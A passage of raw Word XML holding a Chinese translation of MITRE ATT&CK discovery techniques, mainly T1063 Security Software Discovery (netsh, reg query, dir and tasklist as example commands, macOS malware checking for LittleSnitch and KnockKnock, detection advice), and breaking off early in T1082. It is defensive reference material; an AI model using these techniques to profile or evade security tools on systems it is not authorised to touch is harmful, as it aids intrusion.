        <w:t>正常、良性系统和网络事件可能不常见，具体取决于环境及其使用方式。监控进程和命令行参数来查看是否有收集</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>系统和网络信息的行为。</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>可能会使用</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带内置功能的远程访问工具来直接与</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互以收集</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>信息</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来获取信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D43023" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>安全</w:t>
      </w:r>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>软件</w:t>
      </w:r>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="007526C7" w14:paraId="0998C6FA" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12476DCF" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>T1063</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="594C4F6D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>技术：发现</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F8FEF66" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FDFFDFD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>：用户，管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F1F95E5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>监控</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39C65ADE" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45160D82" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00236E13" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A10FFE7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="002A2DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会尝试获取系统上安装的安全软件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A2DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A2DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防御工具和传感器列表。这可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还</w:t>
      </w:r>
      <w:r w:rsidRPr="002A2DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包括本地防火墙规则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A2DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防病毒</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等相关</w:t>
      </w:r>
      <w:r>
        <w:t>信息</w:t>
      </w:r>
      <w:r w:rsidRPr="002A2DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。早期远程访问工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能内置</w:t>
      </w:r>
      <w:r>
        <w:t>了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关</w:t>
      </w:r>
      <w:r>
        <w:t>检查</w:t>
      </w:r>
      <w:r w:rsidRPr="002A2DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79362C49" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4DF7F6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EC3F22" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00EC3F22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以用来获取安全软件信息的示例命令是</w:t>
      </w:r>
      <w:hyperlink r:id="rId180" w:history="1">
        <w:r w:rsidRPr="00EC3F22">
          <w:t>netsh</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EC3F22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:hyperlink r:id="rId181" w:history="1">
        <w:r w:rsidRPr="00EC3F22">
          <w:t>Reg</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EC3F22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>reg query</w:t>
      </w:r>
      <w:r w:rsidRPr="002A2DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="002A2DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3F22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3F22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Tasklist</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3F22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。发现行为的其他指示信息可能更具体地取决于攻击者正在寻找的软件或安全系统的类型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002E738F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Mac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1113EA9A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="002A2DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>acOS</w:t>
      </w:r>
      <w:r w:rsidRPr="002A2DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意软件对</w:t>
      </w:r>
      <w:r w:rsidRPr="002A2DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LittleSnitch</w:t>
      </w:r>
      <w:r w:rsidRPr="002A2DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="002A2DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>KnockKnock</w:t>
      </w:r>
      <w:r w:rsidRPr="002A2DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="002A2DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查已变得越来越普遍。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441BCB85" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795B90A6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C932D4" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AFD909" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>系统和网络发现技术通常用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>攻击者试图</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>了解环境的整个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>过程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不应孤立地看待数据和事件，而应将其视为可能导致其他活动的一系列行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>例如横向移动</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A262F4C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控进程和命令行参数来查看是否有收集</w:t>
      </w:r>
      <w:r>
        <w:t>系统和网络信息的行为。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:t>可能会使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内置功能的远程访问工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以收集</w:t>
      </w:r>
      <w:r>
        <w:t>信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也</w:t>
      </w:r>
      <w:r>
        <w:t>可能会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来获取信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30A40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F14835" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="007526C7" w14:paraId="2468322C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="546BEBAD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>T1082</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B3D1E32" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>技术：发现</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02BC2F8C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0878B700" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>所需权限：用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A1123C4" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E95D97B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId182" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="007526C7">
                <w:t>CAPEC-311</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="007526C7">
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75C5129E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C597A1B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00D10345" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FAE3986" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会尝试</w:t>
      </w:r>
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取操作系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及</w:t>
      </w:r>
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>硬件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关的</w:t>
      </w:r>
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>详细信息，包括版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>补丁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修补程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
